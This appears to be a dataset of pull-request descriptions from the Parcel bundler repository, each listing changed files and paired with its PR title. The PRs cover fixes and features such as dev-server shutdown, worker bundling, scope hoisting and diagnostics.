packages/core/utils/src/http-server.js, packages/core/utils/src/index.js, packages/reporters/dev-server/src/Server.js, packages/reporters/hmr-server/src/HMRServer.js, packages/reporters/hmr-server/src/types.js.flow
This fixes an issue in Parcel where an active server prevented shutdown. This was due to `server.close` not actually closing existing connections, but instead stopping accepting new ones, and never calling its callback [0] [1].
This is accomplished by extracting common code for creating an http or https server and returning both the server and an async function for shutting it down, which includes cleaning up these active connections. These sockets need to be stored to be disposed of later, but if they end on their own, they are also removed from the set of active sockets (thanks to both [0] and [1] for pointing this out).
Test Plan:
* Before applying this patch, run the `react-hmr` example and connect to the devserver with a browser. Note that `ctrl-c` no longer properly ends Parcel.
* …
=> Fix prevented shutdown by clearing active sockets

packages/core/core/src/InternalAsset.js, packages/core/integration-tests/test/javascript.js
Read streams appear to eagerly buffer some data even before they're read from, surfacing the size of this buffer in `readableLength`. Account for this when determining whether a readable stream has been read from.
If someone has insight into how to do this better, I'm definitely open.
Test Plan: 
* Added an integration test for large raw assets
* Prior to this patch, import a large static asset and verify this error: `🚨 Error: Stream has already been read. This may happen if a plugin reads from a stream and does not replace it.`
* Apply the patch, and verify bundles are produced alongside the static asset copied to the dist directory.
cc @bvaughn
=> Account for buffered data when determining whether a readable has been read

packages/core/integration-tests/test/integration/worker-import-scripts/external.js, packages/core/integration-tests/test/integration/worker-import-scripts/importScripts.js, packages/core/integration-tests/test/integration/worker-import-scripts/index-external.js, packages/core/integration-tests/test/integration/worker-import-scripts/index-serviceworker.js, packages/core/integration-tests/test/integration/worker-import-scripts/index-webworker.js, packages/core/integration-tests/test/javascript.js, packages/transformers/js/src/visitors/dependencies.js
This creates new split bundles when workers reference a local script using `importScripts`. Specifiers that do not map to one of Parcel's pipelines (such as, by default, importScripts of external `https://` scripts) are left alone.
This behavior only occurs in web worker and service worker environments.
Test Plan:
* Added integration tests for web worker and service worker cases
* Added integration test for external reference case
=> Create new bundles from `importScripts` in workers

packages/utils/babel-preset-env/package.json, yarn.lock
The `corejs` option in `@babel/preset-env` was added in 7.4.0 (https://babeljs.io/blog/2019/03/19/7.4.0). We should make that the minimal version since we use that option in our default config.
=> Bump minimal version of env preset to one that supports corejs option

packages/core/integration-tests/test/integration/require-async/async.js, packages/core/integration-tests/test/integration/require-async/parcel.js, packages/core/integration-tests/test/integration/require-async/rollup.js, packages/core/integration-tests/test/integration/require-async/ts.js, packages/core/integration-tests/test/javascript.js, packages/resolvers/default/src/DefaultResolver.js, packages/transformers/js/src/visitors/dependencies.js
This optimizes performance for development builds by using the `main` entry in package.json over `module`. `module` is important when using scope hoisting to get smaller builds, but results in needing to compile ES modules down to CommonJS with babel in development builds which can be slow. By using `main` over `module`, we can avoid this cost by using pre-compiled CommonJS modules instead.
On a stress test, this improved performance by ~30%, taking ~10s off the total build time.
Some extra logic is added here to detect common patterns using by compilers when building code with async `import()` to CommonJS. In particular, we handle patterns generated by TypeScript, Rollup, and Parcel itself. This way we can still get code splitting even with precompiled modules.
=> Use `main` over `module` for development builds for performance

packages/core/types/index.js, packages/core/utils/src/debounce.js, packages/core/utils/src/index.js, packages/core/utils/src/throttle.js, packages/reporters/cli/src/UI.js
We found during profiling that a significant amount of time is spent in the cli reporter's `dispatch` action from `useReducer`. Throttling this dispatch improved performance for the stress test by about 16% on my machine, reducing it by about 5.7s. Not reporting transformation progress events at all would improve performance by about double these amounts, but then there is no user feedback that Parcel is progressing. Throttling at 100ms seems to be a pretty good sweet spot, going any higher starts to look less responsive.
=> Throttle ink reporter rendering to 100ms for better performance

packages/core/integration-tests/test/javascript.js, packages/transformers/json/src/JSONTransformer.js
In every major JS engine, parsing a JSON object is slower than parsing and executing `JSON.parse("...")`:
- https://v8.dev/blog/cost-of-javascript-2019#json
- https://github.com/GoogleChromeLabs/json-parse-benchmark
- https://github.com/webpack/webpack/pull/9349
- https://joreteg.com/blog/improving-redux-state-transfer-performance
=> Emit JSON.parse("...") for JSON assets

packages/core/integration-tests/test/integration/require-async/ts-interop-arrow.js, packages/core/integration-tests/test/integration/require-async/ts-interop.js, packages/core/integration-tests/test/javascript.js, packages/transformers/js/src/visitors/dependencies.js, packages/transformers/js/src/visitors/env.js, packages/transformers/js/src/visitors/utils.js
The TypeScript `esModuleInterop` flag generates async imports that look like this:
```js
Promise.resolve().then(function () { return __importStar(require('./foo')); });
```
Parcel correctly identifies this pattern as async, but the `__importStar` function doesn't work properly since the `require` will return a promise instead of the module synchronously. The solution is to transform this to a promise chain like this:
```js
Promise.resolve().then(function () {
return require('./foo');
}).then(function ($parcel$f84b) {
return __importStar($parcel$f84b);
});
```
This way the `__importStar` operates on the result of the promise returned from `require` instead of the promise itself. This is only done if the `require` is not immediately returned without a wrapper, so we should only pay a slight …
=> Detect TypeScript esModuleInterop generated async imports and rewrite

flow-libs/ink.js.flow, packages/core/core/package.json, packages/core/core/src/TargetResolver.js, packages/core/core/src/public/Target.js, packages/core/core/src/types.js, packages/core/core/test/TargetResolver.test.js, packages/core/core/test/fixtures/application-targets/package.json, packages/core/core/test/fixtures/duplicate-targets/package.json, packages/core/diagnostic/src/diagnostic.js, packages/core/parcel/src/cli.js, packages/core/types/index.js, packages/core/utils/src/prettyDiagnostic.js, packages/namers/default/package.json, packages/namers/default/src/DefaultNamer.js, packages/reporters/cli/src/Log.js, packages/reporters/cli/src/emoji.js
This adds improved diagnostics for a few target configuration/namer related issues that have come up frequently.
* #3500 - `Destination name index.js extension does not match bundle type "html"`. This was likely due to having a `main` in package.json for example, which pointed to a `.js` file instead of a `.html` file. However, it was not very clear without knowing about the internals of Parcel. The new error message should point directly to the configuration error:
This is made possible by adding a `loc` property to `Target` objects to track the package.json source location they are defined in. This can be used to construct a diagnostic in the namer. Hopefully this makes it much clearer what the problem is an how to fix it.
* #3816 - `External modules are not supported when building for …
=> Improve diagnostics for target/namer related issues

package.json, packages/core/integration-tests/test/integration/.eslintrc.json, packages/core/parcel-bundler/src/.eslintrc.json, packages/core/parcel-bundler/src/builtins/.eslintrc.json, packages/core/utils/package.json, packages/dev/eslint-config/index.js, packages/reporters/hmr-server/src/HMRServer.js, packages/runtimes/hmr/src/loaders/hmr-runtime.js, yarn.lock
Closes #3882
Bumps:
- eslint 5 to 6
- serialize-to-js 1.x.x to 2.x.x: "removal of deserialize function as being vulnerable to DOS"
- bump handlebars, https-proxy-agent in the lockfile only to silence audit warnings in the monorepo
=> Bump eslint, serialize-to-js, handlebars, https-proxy-agent

packages/core/integration-tests/test/css.js, packages/core/integration-tests/test/integration/css-url-behavior/index.css, packages/transformers/css/src/CSSTransformer.js
Some libraries still include these statements in their stylesheets (see issue).
Closes #3873
**Should `url(#foo)` only be allowed in a `behavior` statement or everywhere?**
`behavior` is non standard (IE)
```css
.lvml {
behavior: url(#default#VML);
display: inline-block;
position: absolute;
}
```
=> Ignore: `url(#...)` (`behavior` property)

packages/configs/default/index.json, packages/core/core/src/ParcelConfig.schema.js, packages/core/core/src/loadParcelConfig.js, packages/core/core/test/loadParcelConfig.test.js, packages/core/parcel/package.json, packages/core/parcel/src/cli.js, packages/core/utils/src/schema.js
This PR updates the parcelrc validator to use the JSON Schema validator, this results in clearer errors and codeframes.
=> [T-206] Validate .parcelrc using the JSON Schema validator

packages/core/utils/src/generateCertificate.js, packages/core/utils/src/http-server.js, packages/examples/react-hmr/package.json, packages/reporters/dev-server/src/Server.js, packages/reporters/hmr-server/src/HMRServer.js
According to #3398 firefox throws errors on our self-signed certificates, this is due to a misconfiguration in the generate script we use.
This PR fixes the script by removing the feature that says our certificates are issued by a CA.
Closes #3398
Run dev server in firefox
=> Fix Firefox certificate warnings

packages/core/integration-tests/test/hmr.js, packages/reporters/hmr-server/src/HMRReporter.js
The HMR server(s) in the hmr reporter weren't being shut down after watchEnd and started before watchStart. This PR fixes that by using these events properly as intended.
Maybe this will also allow us to re-introduce the hmr tests?
This PR also re-enables all HMR server tests with a lot of tweaks so they run reliably on the new virtual fs and properly handle websocket connections so there's no need for any kind of sleeping in the tests.
In a follow-up PR we should probably look into re-enabling all tests for the hmr runtime.
cc @padmaia
=> Fix process hanging when using hmr reporter

packages/core/integration-tests/test/css.js, packages/core/integration-tests/test/javascript.js, packages/core/integration-tests/test/output-formats.js, packages/core/integration-tests/test/scope-hoisting.js, packages/core/integration-tests/test/watcher.js, packages/core/utils/src/relativeBundlePath.js, packages/runtimes/js/src/JSRuntime.js
This makes it so that only relative urls are written into bundles for loading code, and that absolute urls are computed at runtime using `bundle-url`. This makes bundles more portable as `publicUrl` may be absolute.
Test Plan: Adjusted integration tests. Additionally, temporarily added async bundle loading back to the kitchen sink test and verified async js and css was properly loaded.
=> Use relative urls to compute urls for loaders at runtime

babel.config.js, babel.config.json, flow-libs/semver.js.flow, flow-typed/npm/semver_v6.2.x.js, gulpfile.js, packages/dev/babel-preset/package.json, packages/transformers/babel/package.json, packages/transformers/babel/src/getBabelTargets.js, yarn.lock
- Use babel.config.json in the monorepo
- Update semver to make use of new `semver.minVersion` (because the old approach was broken for `*` and returned undefined as the min version in that case)
=> babel.config.json and fix semver usage

packages/core/integration-tests/test/integration/scope-hoisting/es6/commonjs-exports-reassign/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/commonjs-exports-reassign/b.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-commonjs-default/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-commonjs-default/exports.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-commonjs-default/notwrapped.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/hoist.js
This removes support in scope hoisting for interpreting an assignment to the `exports` variable itself as an export.
In Node (and I assume CommonJS in general), `exports` is a binding local to the module, and reassigning it does not affect the module's exports. In other words, requiring a module with the contents `exports = 3` results in an empty exports object, not `3`.
Test Plan: 
* Removed support.
* Verified that test assuming this behavior is broken.
* Adjusted the test to test unwrapped `module.exports` instead, as the test doesn't reflect Node's behavior.
=> Remove support for exporting reassigned CommonJS exports

packages/core/core/src/loadDotEnv.js, packages/core/core/src/public/PluginOptions.js, packages/core/core/src/resolveOptions.js, packages/core/core/src/types.js, packages/core/integration-tests/test/integration/env-file/.env.production, packages/core/integration-tests/test/javascript.js, packages/core/parcel/src/cli.js, packages/core/types/index.js
Previously, `NODE_ENV` varied based on what Parcel was building, which prevented libraries like React, which is used through `ink` in Parcel's CLI, from behaving in production mode in Parcel itself. 
Now, we capture any original `NODE_ENV`  as a build option and pass it through in `env`, and then set Parcel's own  `NODE_ENV` to `PARCEL_BUILD_ENV` if it's set ("production" in builds). Any passed `env` is now merged with the results of loading `dotenv`.
~This required adding a top-level Parcel option for `nodeEnv` as a build option, distinct from the `env` option. `NODE_ENV` could be added to an `env` passed by the cli, but we rely on the absence of `env` to determine whether to load the environment from `dotenv`.~
This also reverses the priority of `dotenv` files, making more specific …
=> Have NODE_ENV reflect Parcel's environment, not what it's building

packages/core/integration-tests/test/integration/scope-hoisting/commonjs/exports-before-module-exports/a.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/exports-before-module-exports/b.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/module-exports-before-exports/a.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/module-exports-before-exports/b.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/hoist.js
In CommonJS, it's possible to assign to properties on both `exports` and `module.exports` as they initially represent the same object. ~Previously in these cases, the exports object was only created for `module.exports` and `exports` usage was transformed to references to an object yet to be declared.~
This temporarily undoes the optimization introduced in #3800 to allow this. We should investigate a better path forward.
Thanks to @devongovett for guidance here :smile:
Test Plan: Added an integration test
=> Scope hoisting: temporarily remove module.exports optimization

packages/core/parcel/package.json, packages/transformers/graphql/package.json
I was testing out Parcel 2 and noticed that the graphql transformer's `package.json`#main entry points to the `src/` file instead of the built one in `lib/`, causing my builds to fail with `Unexpected token` errors.
This PR switches `main` to use the `lib` dir and adds a `source` field to the `package.json`.
N/A
As far as I can tell, any build that tries to use the GraphQL transformer would fail.
=> Point GraphQL Transformer's "main" target to the correct file

.flowconfig, package.json, packages/reporters/dev-server/src/Server.js, packages/reporters/dev-server/src/serverErrors.js, yarn.lock
This updates to flow 0.115 and addresses one violation by explicitly annotating a diagnostic.
Test Plan: `yarn flow`
=> Update to Flow 0.115

packages/core/parcel-bundler/src/builtins/css-loader.js
=> Use parentNode.removeChild instead of link.remove to support IE11

packages/core/utils/src/throttle.js, packages/core/utils/test/throttle.test.js, packages/reporters/cli/src/UI.js
Rather than deferring the execution of the decorated function and ignoring calls until then, invoke it synchronously and ignore calls for the next `delay` seconds. I believe this should address the same intent as #3964 and removes these timers entirely.
This also adds a name to throttled functions and preserves the `this` value when the throttled function is invoked.
Test Plan: Added unit tests. Checked with react-hmr and simple example demo that there is no progress message printed after the build success message.
=> Use a lastCalled time instead of timeouts for throttle

packages/core/integration-tests/test/contentHashing.js, packages/core/integration-tests/test/javascript.js, packages/core/integration-tests/test/output-formats.js, packages/core/integration-tests/test/typescript.js, packages/runtimes/js/package.json, packages/runtimes/js/src/JSRuntime.js
Load external url bundles from relative paths
This makes it so that "raw" assets create runtimes exporting their urls export code that, at runtime, derives an absolute url given a relative path to the bundle, rather than one relative to a `publicUrl`.
Like #3904, this makes use of `bundle-url.js`. Like bundle loader runtimes, this required renaming the runtime `filePath` to the path of the actual Parcel code that generates the runtime. 
Questions: 
* Should the "raw" transformer be renamed to the "url" transformer and be made always opt-in via a named pipeline rather than implicit for any unhandled ("*" in the config) asset?
* Is there a better way of requiring `bundle-url.js` that allows us to preserve a meaningful `filePath` for the runtime? Or possibly a "virtual" path?
Test Plan:
* …
=> Load external url bundles from relative paths

packages/core/integration-tests/test/javascript.js, packages/core/test-utils/src/utils.js, packages/transformers/js/src/JSTransformer.js, packages/transformers/js/src/visitors/process.js
Migrates #2583 to v2. This feature is heavily used in some projects and can save a lot of dead code to be eliminated.
I made two changes compared to v1:
* The `process.browser = true` assignment that might be somewhere in the code is not replaced anymore but always set to `true`. Removing this line could lead to breaking the code in rare situations, but not changing it too `true` would be inconsequent as well. Let me know if you have any thoughts about that.
* The replacement should also be done for Node and Electron. I think there is no need to keep any reference as those should always be static. `process.browser` is different from `process.env` which can change after build time on the server. Tests for Node and Electron as skipped for now, as all those tests were skipped so far. I …
=> V2: Inline process.browser for better code elimination

packages/reporters/cli/src/bundleReport.js
Operator precedence 😉 
before:
```
✨ Built in 7.87s
dist/index.js                                                                                        1.36 KB     22ms
├── .../parcel/packages/runtimes/js/lib/bundle-url.js                   1.33 KB    130ms
├── .../parcel/packages/runtimes/js/lib/loaders/browser/js-loader.js      804 B    217ms
├── .../parcel/packages/runtimes/js/lib/cacheLoader.js                    573 B    112ms
├── .../parcel/packages/runtimes/js/lib/JSRuntime.js                      365 B    174ms
└──                                                                                                     89 B    2.17s
dist/async.529a5838.js                                                                                 160 B     15ms
└── …
```
=> Fixup bundlereport's asset list

packages/core/integration-tests/test/integration/scss-global-data/.sassrc.js, packages/core/integration-tests/test/integration/scss-global-data/index.scss, packages/core/integration-tests/test/integration/scss-global-data/package.json, packages/core/integration-tests/test/sass.js, packages/transformers/sass/src/SassTransformer.js
Fixes #3689 
Currently, when defining a `data` in the `.sassrc.js` config, all SASS/ SCSS files will be overridden by that content. This is confusing in the first place as it is not expected behavior and doesn't fulfill any use case (as far as I can imagine).
In my case, I just got an empty CSS file without any error message (as data only consists of variables).
This PR allows defining code that is imported into all files, which e.g. allows creating global variables or mixings. This makes Parcel v2 compatible with the behavior of Parcel v1.
=> Allow merging of global defined data for sass

.github/workflows/stale.yml
This PR changes the stale action's schedule to only run twice a day, as all stale issues have already been flagged (due to the vast amount of issues we had to run it more frequent so we'd get through all of them in a day). We shouldn't send api calls to github for no reason.
=> Update Stale Action to run only twice a day

packages/optimizers/terser/src/TerserOptimizer.js
Remove unused toplevel variable{s, declarations} when using the commonjs output format (by setting Terser options correctly).
Closes https://github.com/parcel-bundler/parcel/issues/4046
=> Set terser's toplevel flag with commonjs as well

packages/core/core/src/ConfigLoader.js, packages/core/utils/src/config.js
This changes the way `.parcelrc` is resolved inside `node_modules`. Now, rather than looking for a `.parcelrc` in `node_modules`, we always resolve the `.parcelrc` in the project root. Packages in `node_modules` should never depend on a particular Parcel config in order to be built.
In addition, in monorepos, node_modules are likely to be symlinked. In this case, we want to search for a `.parcelrc` from the realpath rather than the node_modules path.
=> Resolve .parcelrc from realpath, and use root .parcelrc in node_modules

package.json
This PR updates the alpha and nightly release scripts to use exact versioning as apparently that's required to work properly when installing.
To release an alpha use: `yarn alpha:release <version>` for example `yarn alpha:release 2.0.0-alpha.4`
To release a nightly use: `yarn nightly:release` (this is called by the action and should never really be called manually)
Closes #4065
=> Fix release scripts to use exact on alpha's

packages/core/integration-tests/test/integration/ts-types/exporting/expected.d.ts, packages/core/integration-tests/test/integration/ts-types/promise-or-value/expected.d.ts, packages/core/integration-tests/test/integration/ts-types/promise-or-value/index.ts, packages/core/integration-tests/test/integration/ts-types/promise-or-value/package.json, packages/core/integration-tests/test/integration/ts-types/promise-or-value/tsconfig.json, packages/core/integration-tests/test/ts-types.js, packages/transformers/typescript-types/src/TSTypesTransformer.js, packages/utils/ts-utils/src/CompilerHost.js
There is currently a bug in the types transformer when using relatively new JS/TS, due to lib definitions failing to resolve, this PR adds a test for it and fixes the bug by calling `this.ts.getDefaultLibFilePath(options);`
=> Fix lib bug in type definition transformer

packages/core/integration-tests/test/integration/globals-module-specifier/a.js, packages/core/integration-tests/test/integration/globals-module-specifier/b.js, packages/core/integration-tests/test/integration/globals-module-specifier/c.js, packages/core/integration-tests/test/integration/globals-module-specifier/package.json, packages/core/integration-tests/test/javascript.js, packages/transformers/js/src/visitors/globals.js
Previously, the `process` global was inserted because the identifier in `export { process } from "./c.js";` was recognized as a ReferencedIdentifer (which it isn't).
I've now added a check that the identifier isn't used in a module specifier.
Closes https://github.com/parcel-bundler/parcel/issues/4003
=> Don't mistake every `export {process}` as the process global

packages/core/core/src/requests.js, packages/reporters/dev-server/src/HMRServer.js
This solves two issues I had with the watcher/HMR:
1. In a monorepo, if you change a file in another package, the watcher does not cause parcel to recompile. This is because the watcher notifies Parcel that the realpath changed, but we store the logical path in the graph. I've worked around this by always taking the realpath before adding a `file` node to the graph, which is used to invalidate the asset. The asset node itself is not changed. There's possibly a case to be made for always taking the realpath in the resolver (node's default behavior) rather than the current behavior of preserving symlinks, but we can discuss and take that on separately if needed.
2. HMR updates are only sent if there are assets that changed which have a browser environment. I'm working in a statically …
=> Watch realpath and always emit HMR updates

packages/core/core/src/TargetDescriptor.schema.js, packages/core/core/src/public/Environment.js, packages/core/core/src/types.js, packages/core/types/index.js, packages/resolvers/default/src/DefaultResolver.js
Related: #144, #3305, #3753.
This adds support for excluding specific node_modules from a bundle. The inverse was already possible via `includeNodeModules` using the array syntax, but now it's possible to use object syntax to exclude specific node_modules in a certain target.
```json
{
"targets": {
"library": {
"includeNodeModules": {
"react": false
}
}
}
}
```
#3753 proposed doing this via `peerDependencies`, but that doesn't allow specifying node modules to include/exclude per target. We may want to support it as a shortcut for `includeNodeModules` across all targets, however.
=> Add support for excluding specific node_modules

packages/bundlers/default/src/DefaultBundler.js, packages/core/integration-tests/test/html.js, packages/core/integration-tests/test/integration/shared-sibling-entries/a.html, packages/core/integration-tests/test/integration/shared-sibling-entries/b.html, packages/core/integration-tests/test/integration/shared-sibling-entries/shared.css, packages/core/integration-tests/test/integration/shared-sibling-entries/shared.js
This fixes cases where two entries depend on a shared asset which has siblings (e.g. a shared JS bundle with a sibling CSS bundle). Due to DFS, the subtree of the shared asset is only processed once, meaning any sibling bundles created due to type changes would only be connected to the first bundle group. To work around this, we store a list of sibling bundles for each asset in the graph, and when we re-visit a shared asset, we connect them all to the current bundle group as well.
=> Ensure that shared sibling bundles are added to all relevant bundle groups

packages/core/integration-tests/test/integration/ts-types/externals/other.tsx, packages/transformers/typescript-tsc/src/TSCTransformer.js, packages/transformers/typescript-types/src/TSTypesTransformer.js
This configures the TypeScript compiler to treat JSX as React calls by default. I'm not sure of the impact of this given the types transformer only emits types, but the compiler warned without this. This is the same default that we set in the tsc transformer.
Fixing this uncovered additional issues with the ts-types fixtures. Several were addressed, but the following remain which don't cause Parcel to fail:
externals/index.tsx:
```ts
3 | import {OtherComponent} from './other';
> 4 | import {External} from 'external';
>   |                        ^^^^^^^^^^^ Cannot find module 'external'.
5 | 
```
externals/index.tsx:
```ts
10 | export const Component: React.FC<Props> = (props) => {
> 11 |   return <OtherComponent>{props.children}</OtherComponent>;
>    |           ^^^^^^^^^^^^^^^ Property …
```
=> TypeScript types transformer: configure compiler default JSX

packages/reporters/cli/src/CLIReporter.js
I forgot a check for log level on log events in the clireporter, this PR adds that check...
It also adds a check for the server log message that only shows when loglevel is `>= info`
Closes #4052
=> Respect log levels in cli reporter

packages/configs/default/index.json, packages/core/core/src/BundleGraph.js, packages/core/core/src/public/BundleGraph.js, packages/core/integration-tests/test/blob-url.js, packages/core/integration-tests/test/css.js, packages/core/integration-tests/test/javascript.js, packages/core/integration-tests/test/less.js, packages/core/integration-tests/test/sass.js, packages/core/integration-tests/test/stylus.js, packages/core/types/index.js, packages/core/utils/src/replaceBundleReferences.js, packages/examples/kitchen-sink/package.json, packages/examples/kitchen-sink/src/index.html, packages/examples/kitchen-sink/src/index.js, packages/examples/kitchen-sink/src/worker.js, packages/packagers/css/src/CSSPackager.js, packages/packagers/html/src/HTMLPackager.js, packages/packagers/js/src/JSPackager.js, packages/runtimes/js/src/JSRuntime.js, packages/transformers/js/src/visitors/dependencies.js
This replaces the packaging-time text-replacement of url dependencies with the results of a runtime asset to determine worker urls and those from other url dependencies. The text replacement remains for css though, where a move to simple relative urls is more appropriate.
To do:
=> Use runtimes to load workers and other urls

packages/bundlers/default/src/DefaultBundler.js, packages/core/integration-tests/test/html.js, packages/core/integration-tests/test/integration/shared-sibling-entries/c.html
Small bug fix for #4067. With more than two pages pointing to the same shared bundle, styles were not applied. This was because the sibling bundle mapping was overwritten during the second traversal.
=> Fix shared inline bundles with more than 2 references

packages/bundlers/default/src/DefaultBundler.js
The behavior for other bundle types was somewhat undefined since we only really handle loading for JS and CSS (via JSRuntime and HtmlPackager).
=> Limit bundle splitting to JS and CSS bundles only

packages/core/integration-tests/test/javascript.js, packages/examples/kitchen-sink/src/index.js, packages/examples/kitchen-sink/src/worker.js, packages/runtimes/js/src/JSRuntime.js, packages/runtimes/js/src/bundle-url.js, packages/runtimes/js/src/get-worker-url.js, packages/transformers/js/src/visitors/dependencies.js
Depends on #4033.
This implements automatic cross-origin loading of worker bundles. Workers (both web workers and service workers) are constrained to the same origin as the document. 
This implements a small runtime to determine whether the currently executing script exists on the same origin as the document. If so, the worker bundle's url is ultimately used by the `Worker` constructor. If not, and the worker is a web worker (not a service worker), a blob url is constructed at runtime to `importScripts` the main worker bundle.
Notes:
* All testing was manual. Our integration tests don't run bundles in a real browser environment and I haven't yet explored mocking the necessary environment to test this in an automated way.
* Some CSP policies may restrict using blob urls to construct …
=> Automatic cross-origin loading of web workers

packages/core/core/src/dumpGraphToGraphViz.js, packages/core/integration-tests/test/html.js, packages/transformers/html/src/inline.js
Currently, if a dependency of an inline asset is updated, the inline bundle is recompiled but the parent is not invalidated. For example, if `test.js` is updated in the following example, the parent HTML file is not changed.
```html
<script>
require('./test.js');
</script>
```
This is because inline bundles are in the same asset group as their parent, making them siblings rather than children. Only the hashes of child bundles are included in the parent, not siblings.
This is fixed by adding a dependency between the parent HTML bundle and the inline assets using the `uniqueKey` as the module specifier (recently added in #4010). This results in separate bundle groups being created for the inline bundles just like normal (non-inline) dependencies. Because of this, the inline bundles are …
=> [T-359] Ensure that parent bundles are invalidated when inline bundles change

packages/core/integration-tests/test/integration/formats/esm-commonjs/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-commonjs-default/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/side-effects-re-exports-all/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/side-effects-re-exports-all/node_modules/bar/foo.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/side-effects-re-exports-all/node_modules/bar/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/side-effects-re-exports-all/node_modules/bar/package.json, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/concat.js, packages/shared/scope-hoisting/src/formats/commonjs.js, packages/shared/scope-hoisting/src/hoist.js, packages/shared/scope-hoisting/src/link.js
See individual commits.
1. Default exports using CommonJS output format caused a syntax error by attempting to declare a variable named `default` which is a reserved word. We now find a valid identifier to use instead.
2. The `cjs_exports` variable introduced in #3905 was never declared which threw an error in strict mode. In sloppy mode it became a global variable. We now ensure it is declared at the top of the program if needed.
3. `sideEffects` false with a namespace import pointing to a module with re-exports was broken because we only marked symbols in the immediate import as used rather than all of the re-exports as well.
4. Default interop variables were sometimes duplicated unnecessarily when referenced from within another scope. This sometimes made terser confused resulting in …
=> Various scope hoisting fixes

azure-pipelines-template.yml
This has CI run a complete `yarn flow check` which is exhaustive:
> Does a full Flow check and prints the results
(from `yarn flow --help`)
The default command for flow is `status`:
> Shows current Flow errors by asking the Flow server
(from `yarn flow --help`)
Which I believe depends on the server state and can be affected by lazy mode: 
```
~/s/parcel $ yarn flow --lazy-mode fs
~/s/parcel $ yarn flow                                                                            (wbinnssmith/flow-check-azure|✔)
yarn run v1.21.1
$ path/to/parcel/node_modules/.bin/flow
No errors!
The Flow server is currently in filesystem lazy mode and is only checking 0/4071 files.
To learn more, visit flow.org/en/docs/lang/lazy-modes
✨  Done in 0.20s.
```
Test Plan: Ran `yarn flow check` locally and verify …
=> Use `flow check` in CI

packages/core/core/src/PackagerRunner.js, packages/core/core/src/Parcel.js, packages/core/core/src/ReporterRunner.js, packages/core/core/src/Transformation.js, packages/core/core/src/Validation.js, packages/core/core/src/public/Asset.js, packages/core/core/src/public/Bundle.js, packages/core/core/src/public/BundleGraph.js, packages/core/core/src/public/Config.js, packages/core/core/src/public/Dependency.js, packages/core/core/src/public/Environment.js, packages/core/core/src/public/MutableBundleGraph.js, packages/core/core/src/public/PluginOptions.js, packages/core/core/src/public/Target.js, packages/core/core/src/types.js, packages/core/core/src/worker.js, packages/core/core/test/PublicAsset.test.js, packages/core/core/test/PublicBundle.test.js, packages/core/core/test/PublicDependency.test.js, packages/core/utils/src/DefaultMap.js, packages/core/utils/src/index.js, packages/core/utils/test/DefaultMap.test.js, packages/core/workers/src/WorkerFarm.js, packages/core/workers/src/child.js, packages/core/workers/test/integration/workerfarm/resolve-shared-reference.js, packages/core/workers/test/workerfarm.js
This caches the public api wrappers that we create from internal objects to give to plugins. Having public wrappers created whenever the public api boundary is crossed has been error prone, as plugins have assumed object reference equality when working with structures like assets, bundles, etc.
This adds `DefaultWeakMap` to make caching these wrappers based on their arguments easier.
Alternative: This implementation could be simplified significantly by effectively memoizing the class constructor. This would probably be made available as a static/exported function and direct use of the constructor would be avoided.
Test Plan: Added unit tests for the most critical public wrappers.
=> Reuse public api wrappers

packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/TargetResolver.js, packages/core/core/src/public/Target.js, packages/core/core/src/resolveOptions.js, packages/core/core/src/types.js, packages/core/core/test/AssetGraph.test.js, packages/core/core/test/TargetResolver.test.js, packages/core/core/test/utils.js, packages/core/parcel/src/cli.js, packages/core/types/index.js, packages/core/utils/src/replaceBundleReferences.js, packages/packagers/html/src/HTMLPackager.js
Previously, we had removed the `--out-dir` and `--public-url` CLI options that existed in Parcel 1 due to multi-target support in Parcel 2. However, due to confusion, along with needs to change these dynamically rather than hard coding them in package.json, they make their triumphant return in this PR.
`publicUrl` and `distDir` are still options to targets, but the CLI options are now used by default in case these are not defined. In particular, `--dist-dir` is used when there isn't a top-level package.json field for the target's main entry, and `--public-url` is used when a `publicUrl` option isn't set in the target config in package.json.
=> Add back --dist-dir and --public-url CLI options

packages/bundlers/default/src/DefaultBundler.js, packages/core/integration-tests/test/integration/dynamic-common-large/common.js, packages/core/integration-tests/test/integration/dynamic-common-large/index.js, packages/core/integration-tests/test/javascript.js
This allows common shared bundles to be deduplicated (have assets in them removed if they're present in the bundle's ancestry).
`isSplittable` controls both whether a bundle is split and if it is deduplicated. We should reconsider these flags and their names @devongovett.
Test Plan: Changed the common bundle test to include an asset common to the root bundle and the shared bundle. `yarn test`.
=> Deduplicate shared bundles

packages/transformers/babel/src/babel7.js, packages/transformers/babel/src/config.js, packages/transformers/babel/src/constants.js
This restricts babel loading and autoinstallation to ^7.0.0 using the new range support in the package manager.
This also removes unnecessary reload logic.
Test Plan: 
* Run parcel in an app without a version of @babel/core 
* Verify it autoinstalled and created an entry in package.json for @babel/core with a range of ^7.0.0
* Clear cache and run parcel again and verify it does not autoinstall.
=> BabelTransformer: accept @babel/core ^7.0.0 and remove reload logic

packages/core/core/src/PackagerRunner.js
Fixed some bad recursion that was introduced in #4114. 
I was seeing call stack size exceeded limit errors building a large project. I made the fix and confirmed it built and was not adding already included bundles many times.
=> Fix getBundlesIncludedInHash()

packages/core/package-manager/src/NodePackageManager.js
This has `NodePackageManager` use `resolveConfig` to find the nearest `package.json` rather than its own function.
Test Plan: `yarn test:unit`
=> NodePackageManager: use resolveConfig instead of local function

packages/core/integration-tests/test/integration/html-pkg-source/index.html, packages/core/integration-tests/test/integration/html-pkg-source/package.json, packages/core/integration-tests/test/server.js, packages/reporters/dev-server/package.json, packages/reporters/dev-server/src/Server.js
Under certain circumstances, the main html bundle could be written to `.parcel-cache/dist/project-name/index.html`, while the default index is served from `.parcel-cache/dist/index.html`, causing a 404.
Now, we don't blindly take the main bundle's filename but instead the relative path to the dist dir.
